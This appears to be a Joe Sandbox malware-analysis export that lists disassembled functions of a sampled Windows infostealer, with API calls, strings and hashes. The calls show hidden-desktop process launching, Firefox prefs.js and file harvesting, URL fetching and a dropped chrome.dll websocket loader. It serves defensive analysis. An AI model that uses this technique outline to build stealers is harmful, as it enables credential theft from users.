GTC, xrefs: 6CE43912
MOZ_TIMESTAMP_MODE, xrefs: 6CE435DB
QPC, xrefs: 6CE438FC
AuthcAMDenti, xrefs: 6CE43946
GenuntelineI, xrefs: 6CE43639

Memory Dump Source

Source File: 00000000.00000002.1798696975.000000006CE41000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CE40000, based on PE: true

Associated: 00000000.00000002.1798670349.000000006CE40000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1798796176.000000006CEBD000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1798825296.000000006CECE000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1798873657.000000006CED2000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce40000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: c07edd9d7140ecfd1780b61c0e2b0f631b8cf214455117678ad6174d4ca3155c
Instruction ID: c783c7094afc3ad867a6c0e545b60e280e39e729cb2aa0ed1e6f60f86f16234a
Opcode Fuzzy Hash: c07edd9d7140ecfd1780b61c0e2b0f631b8cf214455117678ad6174d4ca3155c
Instruction Fuzzy Hash: C7B1C471B083009FDB08DF28D54565ABBF5FB8A704F258A3EE8A9D3790D7349A01CB91

Function 00409E30 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157stringsleepprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409E47

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D41C70,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

wsprintfA.USER32 ref: 00409E7F
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
memset.MSVCRT ref: 00409EED
lstrcatA.KERNEL32(00000000,?), ref: 00409F03
lstrcatA.KERNEL32(00000000,?), ref: 00409F17
lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
memset.MSVCRT ref: 00409F3D
lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
memset.MSVCRT ref: 00409F9C
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
Sleep.KERNEL32(00001388), ref: 0040A013
CloseDesktop.USER32(00000000), ref: 0040A060

Strings

D, xrefs: 00409FA4

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
String ID: D
API String ID: 1347862506-2746444292
Opcode ID: 5fec0533ac065794445671fd61b58b64ee70a5548717729610da2360c899be9b
Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
Opcode Fuzzy Hash: 5fec0533ac065794445671fd61b58b64ee70a5548717729610da2360c899be9b
Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55

Function 004140F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00414113
FindFirstFileA.KERNEL32(?,?), ref: 0041412A
StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
FindClose.KERNEL32(000000FF), ref: 004142D1

Strings

%s\%s, xrefs: 00414107

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 56be097dd41b37eec2f286b80705a22b1f638b3d5a3a94ada7547c1fb4d5744b
Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
Opcode Fuzzy Hash: 56be097dd41b37eec2f286b80705a22b1f638b3d5a3a94ada7547c1fb4d5744b
Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59

Function 00405000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
RtlAllocateHeap.NTDLL(00000000), ref: 00405021
InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
InternetCloseHandle.WININET(+aA), ref: 00405109
InternetCloseHandle.WININET(?), ref: 00405116

Strings

+aA, xrefs: 00405051, 00405134
+aA, xrefs: 00405105, 0040508D, 00405090, 00405108

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID: +aA$+aA
API String ID: 1008454911-2425922966
Opcode ID: 98fda9dd47afbb31f569456bda6cf23f87dd0c2bd47beb0f32d9edc517341d3c
Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
Opcode Fuzzy Hash: 98fda9dd47afbb31f569456bda6cf23f87dd0c2bd47beb0f32d9edc517341d3c
Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D

Function 0040F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040FBB1
FindClose.KERNEL32(000000FF), ref: 0040FBC3

Strings

prefs.js, xrefs: 0040F912

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: a6d1f8a1f4e5e1c444a908303e295372fd0e0896113058d80c1dbe036249d875
Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
Opcode Fuzzy Hash: a6d1f8a1f4e5e1c444a908303e295372fd0e0896113058d80c1dbe036249d875
Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A

Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,00401F6C,?,004252EC,?,?,00000000,?,00000000), ref: 00401963
StrCmpCA.SHLWAPI(?,00425394), ref: 004019B3
StrCmpCA.SHLWAPI(?,0042543C), ref: 004019C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
DeleteFileA.KERNEL32(00000000), ref: 00401E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
FindClose.KERNEL32(000000FF), ref: 00401E72

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Strings

\*.*, xrefs: 00401831

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 2aae5fedb5ca0bcce5c0854e9fc1c66a97dbd59477e3d8c196beb7393fc58857
Instruction ID: a576ed9f26fd673c6d53a896fc8188a2a0655e62510251b9f9068b5a07b58df1
Opcode Fuzzy Hash: 2aae5fedb5ca0bcce5c0854e9fc1c66a97dbd59477e3d8c196beb7393fc58857
Instruction Fuzzy Hash: 45125071A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9

Function 0040DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040DECC
FindClose.KERNEL32(000000FF), ref: 0040DEDE

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: cab11e21e166cb8220ecff9f738f4ba36c641b26be6891b6ae9acd9dfdf87c63
Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
Opcode Fuzzy Hash: cab11e21e166cb8220ecff9f738f4ba36c641b26be6891b6ae9acd9dfdf87c63
Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A

Function 0040A090 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
GetProcAddress.KERNEL32(6D850000,connect_to_websocket), ref: 0040A0BE
GetProcAddress.KERNEL32(6D850000,free_result), ref: 0040A0D5
FreeLibrary.KERNEL32(6D850000,?,004108E4), ref: 0040A0F9

Strings

connect_to_websocket, xrefs: 0040A0B3
free_result, xrefs: 0040A0C9
C:\ProgramData\chrome.dll, xrefs: 0040A093

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
API String ID: 2256533930-1545816527
Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B

Function 004198E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
CloseHandle.KERNEL32(00000000), ref: 00419987
CloseHandle.KERNEL32(00409FDE), ref: 00419993

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91

Function 0040E530 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF

Strings

\*.*, xrefs: 0040E54D
@, xrefs: 0040ECF5, 0040E6EB, 0040E81C, 0040E95B, 0040E5B9, 0040E6EE, 0040E81F, 0040E95E

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*$@
API String ID: 433455689-2355794846
Opcode ID: 9095e9b452ccc9a5fbcdbeb0008a891117fd63712cc9fd922b5352d0488e3247
Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
Opcode Fuzzy Hash: 9095e9b452ccc9a5fbcdbeb0008a891117fd63712cc9fd922b5352d0488e3247
Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A

Function 00417D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
LocalFree.KERNEL32(00000000), ref: 00417EB2

Strings

/ , xrefs: 00417E0F

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
